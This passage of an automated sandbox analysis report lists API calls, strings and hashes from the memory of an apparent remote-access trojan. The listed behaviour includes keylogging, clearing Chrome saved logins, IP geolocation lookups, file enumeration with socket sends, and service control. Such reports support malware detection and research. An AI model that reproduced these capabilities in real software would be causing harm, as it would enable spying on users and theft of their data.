                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                • String ID: !D@$PowrProf.dll$SetSuspendState
                                • API String ID: 1589313981-2876530381
                                • Opcode ID: 06b2ed81386eea833f57913314ae7cc45cedb7ecee8fca0ea64c9477fec69274
                                • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                • Opcode Fuzzy Hash: 06b2ed81386eea833f57913314ae7cc45cedb7ecee8fca0ea64c9477fec69274
                                • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00413549: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
                                  • Part of subcall function 00413549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
                                  • Part of subcall function 00413549: RegCloseKey.ADVAPI32(00000000), ref: 00413592
                                • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                • ExitProcess.KERNEL32 ref: 0040F8CA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseExitOpenProcessQuerySleepValue
                                • String ID: 4.9.4 Pro$override$pth_unenc$Mw
                                • API String ID: 2281282204-1121629836
                                • Opcode ID: 58c5b883e5d172f22ef58a46adbd46fba81c8570fd30b9f4b5b12bcade53b407
                                • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                • Opcode Fuzzy Hash: 58c5b883e5d172f22ef58a46adbd46fba81c8570fd30b9f4b5b12bcade53b407
                                • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID: ACP$OCP$['E
                                • API String ID: 2299586839-2532616801
                                • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                Strings
                                • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleOpen$FileRead
                                • String ID: http://geoplugin.net/json.gp
                                • API String ID: 3121278467-91888290
                                • Opcode ID: 1e9fec68a0fa9a491aeb73d0e269fc382ae80b43ef1841fb67e99dd13ca0ad51
                                • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                • Opcode Fuzzy Hash: 1e9fec68a0fa9a491aeb73d0e269fc382ae80b43ef1841fb67e99dd13ca0ad51
                                • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                • GetLastError.KERNEL32 ref: 0040BA58
                                Strings
                                • [Chrome StoredLogins not found], xrefs: 0040BA72
                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                • UserProfile, xrefs: 0040BA1E
                                • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                • API String ID: 2018770650-1062637481
                                • Opcode ID: 7df5978969732fb09709de34775d6ce1a623c26fc4145e618767f27fcf07f662
                                • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                • Opcode Fuzzy Hash: 7df5978969732fb09709de34775d6ce1a623c26fc4145e618767f27fcf07f662
                                • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                • GetLastError.KERNEL32 ref: 0041799D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                • String ID: SeShutdownPrivilege
                                • API String ID: 3534403312-3733053543
                                • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __EH_prolog.LIBCMT ref: 00409258
                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                • FindClose.KERNEL32(00000000), ref: 004093C1
                                  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,00000000,00000000,?,00474EF8,?), ref: 00404E38
                                  • Part of subcall function 00404E26: SetEvent.KERNEL32(00000000), ref: 00404E43
                                  • Part of subcall function 00404E26: CloseHandle.KERNEL32(00000000), ref: 00404E4C
                                • FindClose.KERNEL32(00000000), ref: 004095B9
                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                • String ID:
                                • API String ID: 1824512719-0
                                • Opcode ID: f9045dcdb2f3133ff8fba91c5ff4e6bf62ac57e12963de0168c3bd7490a17388
                                • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                • Opcode Fuzzy Hash: f9045dcdb2f3133ff8fba91c5ff4e6bf62ac57e12963de0168c3bd7490a17388
                                • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Service$CloseHandle$Open$ManagerStart
                                • String ID:
                                • API String ID: 276877138-0
                                • Opcode ID: 3fc825cdaf5b3c830df2a570b4d58928aafbb4be2e2bcb8024994744d056a879
                                • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                • Opcode Fuzzy Hash: 3fc825cdaf5b3c830df2a570b4d58928aafbb4be2e2bcb8024994744d056a879
                                • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                • _wcschr.LIBVCRUNTIME ref: 00451E4A
                                • _wcschr.LIBVCRUNTIME ref: 00451E58
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                • String ID: sJD
                                • API String ID: 4212172061-3536923933
                                • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$FirstNextsend
                                • String ID: (eF$XPG$XPG
                                • API String ID: 4113138495-1496965907
                                • Opcode ID: 7493802b9fea3f653f5859ff7eede1918c289d9ff4253d111e6d79fb62445a1f
                                • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                • Opcode Fuzzy Hash: 7493802b9fea3f653f5859ff7eede1918c289d9ff4253d111e6d79fb62445a1f
                                • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                • wsprintfW.USER32 ref: 0040B1F3
                                  • Part of subcall function 0040A636: SetEvent.KERNEL32(00000000,?,00000000,0040B20A,00000000), ref: 0040A662
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: EventLocalTimewsprintf
                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                • API String ID: 1497725170-248792730
                                • Opcode ID: a7c6f27475bfec295d022b2ba5d983e1240c8cfcb4a2fe4930fa699ea7be73b7
                                • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                • Opcode Fuzzy Hash: a7c6f27475bfec295d022b2ba5d983e1240c8cfcb4a2fe4930fa699ea7be73b7
                                • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Resource$FindLoadLockSizeof
                                • String ID: SETTINGS
                                • API String ID: 3473537107-594951305
                                • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • __EH_prolog.LIBCMT ref: 0040966A
                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstH_prologNext
                                • String ID:
                                • API String ID: 1157919129-0
                                • Opcode ID: 8a5ce0672f9b165c8b59fe5e999e5299a44c6451e72dbf911edcb1b5cbd094d9
                                • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                • Opcode Fuzzy Hash: 8a5ce0672f9b165c8b59fe5e999e5299a44c6451e72dbf911edcb1b5cbd094d9
                                • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                  • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                  • Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                  • Part of subcall function 0041376F: RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateInfoParametersSystemValue
                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                • API String ID: 4127273184-3576401099
                                • Opcode ID: a05115c3504dfde330e24bf23dcfa1352310ad822a085fdd45549c78b87fb04f
                                • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                • Opcode Fuzzy Hash: a05115c3504dfde330e24bf23dcfa1352310ad822a085fdd45549c78b87fb04f
                                • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetCurrentProcess.KERNEL32(00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG,00446136,00000003), ref: 004432D6
                                • TerminateProcess.KERNEL32(00000000), ref: 004432DD
                                • ExitProcess.KERNEL32 ref: 004432EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CurrentExitTerminate
                                • String ID: PkGNG
                                • API String ID: 1703294689-263838557
                                • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
